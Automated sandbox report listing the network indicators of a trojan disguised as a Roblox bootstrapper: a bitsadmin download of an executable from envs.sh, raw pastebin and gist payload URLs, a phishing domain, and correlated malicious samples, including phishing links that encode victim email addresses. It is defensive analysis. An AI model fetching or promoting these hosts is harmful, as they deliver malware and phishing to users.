          https://github.com/zzzprojects/html-agility-pack/issues/513BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://getsolara.dev/SuspectedBootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drtrue
          • Avira URL Cloud: phishing
          unknown
          https://getsolara.dev/XBootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: phishing
          unknown
          https://www.nuget.org/packages/Newtonsoft.Json.BsonBootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/wUB.exeC:bitsadmin.exe, 00000004.00000002.3114396612.00000000032DA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://clientsettings.roblox.comBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://pastebin.comBootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msiBootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268014B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680187000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://pastebin.comBootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://clientsettings.roblox.comBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.cBootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.20.4.235
          pastebin.comUnited States
          13335CLOUDFLARENETUStrue
          128.116.119.3
          edge-term4-lhr2.roblox.comUnited States
          22697ROBLOX-PRODUCTIONUSfalse
          89.163.145.170
          envs.shGermany
          24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
          104.21.93.27
          getsolara.devUnited States
          13335CLOUDFLARENETUSfalse
          104.20.23.46
          www.nodejs.orgUnited States
          13335CLOUDFLARENETUSfalse
          IP
          127.0.0.1
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1511791
          Start date and time:2024-09-16 12:21:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@11/14@5/6
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 212
          • Number of non-executed functions: 1
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.168.117.173
          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target BootstrapperV1.19.exe, PID 6516 because it is empty
          • Execution Graph export aborted for target SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, PID 7144 because it is empty
          • Execution Graph export aborted for target bitsadmin.exe, PID 3744 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          TimeTypeDescription
          06:22:22API Interceptor2x Sleep call for process: svchost.exe modified
          06:22:23API Interceptor66x Sleep call for process: BootstrapperV1.19.exe modified
          06:22:45API Interceptor1x Sleep call for process: WerFault.exe modified
          06:24:18API Interceptor2x Sleep call for process: bitsadmin.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
          • pastebin.com/raw/V9y5Q5vv
          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
          • pastebin.com/raw/NsQ5qTHr
          Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
          • pastebin.com/raw/NsQ5qTHr
          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
          • pastebin.com/raw/NsQ5qTHr
          Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
          • pastebin.com/raw/NsQ5qTHr
          Update on Payment.jsGet hashmaliciousWSHRATBrowse
          • pastebin.com/raw/NsQ5qTHr
          128.116.119.3https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
            https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
              RFAwChXSve.exeGet hashmaliciousDCRatBrowse
                104.21.93.27SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                  SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                      104.20.23.46BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                            SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                              solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                TK7.vbsGet hashmaliciousPureLog Stealer, XWorm, zgRATBrowse
                                  SmartConvertPDF_48187981.msiGet hashmaliciousUnknownBrowse
                                    FreeTemplates_46070101.msiGet hashmaliciousUnknownBrowse
                                      SecuriteInfo.com.PUA.Tool.Proxy.2579.7454.1991.exeGet hashmaliciousUnknownBrowse
                                        SecuriteInfo.com.PUA.Tool.Proxy.2579.7454.1991.exeGet hashmaliciousUnknownBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.nodejs.orgBootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 104.20.23.46
                                          RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 104.20.22.46
                                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.23.46
                                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.23.46
                                          SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.22.46
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.23.46
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.22.46
                                          solarabootstrapper.exeGet hashmaliciousXWormBrowse
                                          • 104.20.23.46
                                          3jF5V4T8LO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 104.20.22.46
                                          pastebin.comOTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
                                          • 104.20.3.235
                                          SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 104.20.3.235
                                          PjkFCWhi.exeGet hashmaliciousXWormBrowse
                                          • 104.20.4.235
                                          BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 104.20.3.235
                                          client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                          • 104.20.3.235
                                          GKrKPXOkdF.zsb.dllGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          bdsBbxwPyV.ena.dllGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          fblXRRCHON.pos.dllGet hashmaliciousUnknownBrowse
                                          • 104.20.4.235
                                          GmsiIZXruf.hos.dllGet hashmaliciousUnknownBrowse
                                          • 104.20.3.235
                                          file.exeGet hashmaliciousXWormBrowse
                                          • 172.67.19.24
                                          getsolara.devBootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 172.67.203.125
                                          RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 172.67.203.125
                                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.93.27
                                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.203.125
                                          SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.93.27
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                          • 172.67.203.125
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                          • 104.21.93.27
                                          edge-term4-lhr2.roblox.comhttps://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                          • 128.116.119.3
                                          https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                          • 128.116.119.3
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ROBLOX-PRODUCTIONUSBootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          • 128.116.123.4
                                          RHUENHera1.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 128.116.21.3
                                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          • 128.116.123.3
                                          SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                          • 128.116.123.3
                                          https://roblox.tz/games/10449761463/BOSS-The-Strongest-Battlegrounds?privateServerLinkCode=11856892146830167735895077236647Get hashmaliciousUnknownBrowse
                                          • 128.116.44.4
                                          SecuriteInfo.com.Win32.MalwareX-gen.6231.15153.exeGet hashmaliciousUnknownBrowse
                                          • 128.116.44.3
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                          • 128.116.123.4
                                          SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                          • 128.116.21.4
                                          https://roblox.com.zm/games/10449761463/The-Strongest-Battlegrounds?privateServerLinkCode=22919554639422626360922039380445Get hashmaliciousUnknownBrowse
                                          • 128.116.119.4
                                          https://shrturl.net/pmf-gx3nGet hashmaliciousUnknownBrowse
                                          • 128.116.123.4
                                          MYLOC-ASIPBackboneofmyLocmanagedITAGDEhttps://multichainfix.pages.dev/chunks/patternsGet hashmaliciousUnknownBrowse
                                          • 80.82.210.217
                                          bot_library.exeGet hashmaliciousUnknownBrowse
                                          • 46.20.35.116
                                          https://u1404228.ct.sendgrid.net/ls/click?upn=u001.53NsXfgUBOeYzK87Mt8UmmFmJrZ7XUeaM2H1JJzIOlLD8XdRMGUjLjiETSkkNSOO1aPcOhsB-2B6p58337PPTvLBJHf93ZwdhKuc0pYJ3CCFhPzGYkRFXax0jGvIeRFmcP5G0BUyJ6YhdCuxj2rmKfEA3sfYg2UNxl72w1Me3oPfdrF6jbhGk315PA9TABMIUQaw-2BWiKWUThNlxL-2FiIJdoH5tiTQT-2Bm8o6f2DtPJqJqYyOmKsC6Z8r8BDMH-2BRyR0DPAbc1o4jsJAeLDJ31LwWjsFQYr3zFK5cIf8Mbd-2BRzOeXFDSMm6es3Y0fepvpPG5r7pfagssMFSYnyu8MHsVv5hRcIKJqjAZyLx1ckeV-2FaCznPfw8naJb82iSt3TNueNL1vH7DevWmKVRPxk4wZ5wzTJXKbWW9anlXuh-2BQXFzp8R8-2BdEEizEjCv3UcDuHMQ1pDH865wy4DUZnYMpZjJQJPawcQswhgRnWgvPzhIRyQE-2Bc-3DkIeO_CR4Iv1KReyG-2BUTiHEM2iSrmxUTGCd7nll-2F8pyW4fRHUIiL68JldL5hjEvlqIxpWk9hPYxNH8eo9VRHfVERALBwpMyAhjDc4FUwScFs2ucRUabaJ73tdO-2FPebairfMf4xwZ2dpDlmkqO5pmgc1gE0gGghSpi3dDGJNhz4YymAGUOPzRzAYltzk0Ba7IAVZeXH7Jn8rume2KIoU57-2Fl62ae-2FaTXSu1TIVQ6Migf-2F6NGXqO6vztNaikiQe23mzDzfi19JJ-2FVN5j6ZPVhD34lLHzKpdiifzixAZur7VZCR5Hc24MfYQGTYVbJWBIhMdpT2lgG-2Bg-2FTIWWIZlY-2Fzm-2BK3i-2F0Q-3D-3DGet hashmaliciousUnknownBrowse
                                          • 85.114.159.118
                                          https://swishmax.en.download.it/Get hashmaliciousPureLog StealerBrowse
                                          • 80.82.210.217
                                          https://m.exactag.com/cl.aspx?extProvApi=sixt-crm_newsletter&extProvId=313&extPu=nl_rac_de&extLi=DE_COR_RENT_CRM_B2C_24_CW33_From%20Intermediate%20Push_ONT_NLW_de_DE_Streichpreis_138402&extCr=Footer_rent&extSi=nl_rac_de_2408_DE&url=http%3a%2f%2ftarumian.am/yaer/ZHdhcm5lckBmbGJsYXd5ZXJzLmNvbQ==Get hashmaliciousPhisherBrowse
                                          • 85.14.248.91
                                          https://m.exactag.com/cl.aspx?extProvApi=sixt-crm_newsletter&extProvId=313&extPu=nl_rac_de&extLi=DE_COR_RENT_CRM_B2C_24_CW33_From%20Intermediate%20Push_ONT_NLW_de_DE_Streichpreis_138402&extCr=Footer_rent&extSi=nl_rac_de_2408_DE&url=http%3a%2f%2ftarumian.am/yaer/ZHdhcm5lckBmbGJsYXd5ZXJzLmNvbQ==Get hashmaliciousPhisherBrowse
                                          • 85.14.248.91
                                          https://drive.filen.io/d/efd03548-4c04-4f27-907a-68aa3da5018c#XwywfS3PS7PVPvd9BXGzmcuwV3JZMasHGet hashmaliciousUnknownBrowse
                                          • 146.0.41.208
                                          firmware.m68k.elfGet hashmaliciousUnknownBrowse
                                          • 89.163.230.138
                                          https://mergeseverd-apps.pages.dev/chunks/patterns/cpupath.html/wallet/inputs.htmlGet hashmaliciousUnknownBrowse
                                          • 80.82.210.217
                                          http://lazily-devoted-snipe.pgsdemo.comGet hashmaliciousUnknownBrowse
                                          • 217.79.187.68
                                          CLOUDFLARENETUShttps://www.cognitoforms.com/f/Zx2NwRsniUqctqN5Rp57pg/1Get hashmaliciousHTMLPhisherBrowse
                                          • 1.1.1.1
                                          SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 188.114.97.3
                                          v2.1.pdfGet hashmaliciousUnknownBrowse
                                          • 104.18.95.41
                                          Ftnm8N06kJ.binGet hashmaliciousK4spreaderBrowse
                                          • 172.67.139.243
                                          https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
                                          • 104.18.10.207
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s/%E2%80%8Bcd%C2%ADlsao%C2%ADmja%C2%ADte%C2%AD.h%C2%ADi%E2%80%8Ba%C2%ADz%C2%ADw%E2%80%8B.i%C2%ADr%2F.well-know%2Fre%2F1781008251/amVzc2ljYS5tZWFyc0BwZXJzaW1tb25ob21lcy5jb20=Get hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          OTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
                                          • 172.67.74.152
                                          Documenti di spedizione 00039488580006996960.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 104.26.13.205
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
                                          • 104.21.47.158
                                          https://reportesud.com/conceal/nuns/426176721460/bWFya2V0aW5nQHN0b3Jtc2hpZWxkLmV1Get hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          CLOUDFLARENETUShttps://www.cognitoforms.com/f/Zx2NwRsniUqctqN5Rp57pg/1Get hashmaliciousHTMLPhisherBrowse
                                          • 1.1.1.1
                                          SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 188.114.97.3
                                          v2.1.pdfGet hashmaliciousUnknownBrowse
                                          • 104.18.95.41
                                          Ftnm8N06kJ.binGet hashmaliciousK4spreaderBrowse
                                          • 172.67.139.243
                                          https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
                                          • 104.18.10.207
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s/%E2%80%8Bcd%C2%ADlsao%C2%ADmja%C2%ADte%C2%AD.h%C2%ADi%E2%80%8Ba%C2%ADz%C2%ADw%E2%80%8B.i%C2%ADr%2F.well-know%2Fre%2F1781008251/amVzc2ljYS5tZWFyc0BwZXJzaW1tb25ob21lcy5jb20=Get hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          OTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
                                          • 172.67.74.152
                                          Documenti di spedizione 00039488580006996960.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 104.26.13.205
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
                                          • 104.21.47.158
                                          https://reportesud.com/conceal/nuns/426176721460/bWFya2V0aW5nQHN0b3Jtc2hpZWxkLmV1Get hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          28a2c9bd18a11de089ef85a160da29e4v2.1.pdfGet hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          https://vente-directe-dv.com/Get hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Feur01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fwww.google.com%252Furl%253Fq%253D3HOSozuuQiApLjODz3yh%2526rct%253DtTPSJ3J3wDFX0jkXyycT%2526sa%253Dt%2526esrc%253DWSECxFgECA0xys8Em2FL%2526source%253D%2526cd%253DHXUursu8uEcr4eTiw9XH%2526cad%253DXpPkDfJ9mfdQ6lDJVS0Y%2526ved%253DxjnktlqryYWwZIBRrgvK%2526uact%253D%2526url%253Damp%25252Ffsm.org.ro%25252Fkam%25252FP6eMate3obgtUuBHU8EaICz7%252FY2FwbGlzYm9hLmFkamNwQGFtbi5wdA%253D%253D%26data%3D05%257C02%257Cpaixao.martins%2540marinha.pt%257C3c3e1a3e2fa545d7929f08dcd62b4786%257Cab1c4186bfe7466397fa53f0e33bc8c2%257C0%257C0%257C638620728650372772%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C0%257C%257C%257C%26sdata%3Dec7A1oupHn%252B1XjHVVw6F6zHFSBGw6cPg6y8E2PQAl%252FE%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=7454e745acb8e5bfc428b3d443bfe9cd76f2c29fc659abd20672c5583e63c28fGet hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
                                          • 89.163.145.170
                                          http://185.215.113.19/283Get hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bn%C2%ADu%C2%ADj%C2%ADo%C2%ADo%C2%ADm.%E2%80%8Ba%C2%ADi%2Fass%2Flol%2Fwtrwlubz6LjwvqYx6RFFRSbU/YmxhbmNoZS5idXJuc0BlbGRlcnMuY29tLmF1Get hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          Benefit Upadate For Guillaume.a.docxGet hashmaliciousHTMLPhisherBrowse
                                          • 89.163.145.170
                                          https://lixowaste.com/campaigns/nn142hg6t57a3/track-opening/aa337vcwjff41Get hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          https://mailing.robyspectacles.com/assets/YXBwL2N1c3RvbWVycy82MzIxZThiNzI0NzM2L2hvbWUvdGVtcGxhdGVzLzY2ZGYwZjMzNTkwOTEvY3Nz/bootstrap.min.cssGet hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          https://www.waigroup.com.au/Get hashmaliciousUnknownBrowse
                                          • 89.163.145.170
                                          3b5074b1b5d032e5620f69f9f700ff0eOTPAuthenticator.wsfGet hashmaliciousAsyncRATBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          Documenti di spedizione 00039488580006996960.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDDtrigyycT&sa=t&esrc=DtrigFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJFpgpgNlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fs%C2%ADq%C2%ADt%C2%ADem%C2%ADpl%C2%ADo%C2%AD.%C2%ADc%C2%ADl//wp-includes/pomo/.dev//hji6ufuo/Z2lhY29tb2dpb3JnaW8uY2VudHJpdHRvQG1wcy5pdA===$%E3%80%82&data=05%7C02%7Cgiacomogiorgio.centritto@mps.it%7C7c1a2223a79d4fd6fd7a08dcd51521b8%7C402b15a57cb94d1b85a349542f8bd230%7C0%7C0%7C638619533982563608%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=eMy46hqDEiP5rHA2M0xAW5wG1Dj23+pTKoHkIPweAEc=&reserved=0Get hashmaliciousHTMLPhisherBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          September PO.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          TT USD 170,196 - 16.9.2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          SecuriteInfo.com.Win32.MalwareX-gen.5836.3825.exeGet hashmaliciousUnknownBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          DONGHONG 8 - FDA.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          M.V CHARIKLIA JUNIOR - PARTICULARS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 104.20.4.235
                                          • 128.116.119.3
                                          • 104.21.93.27
                                          • 104.20.23.46
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
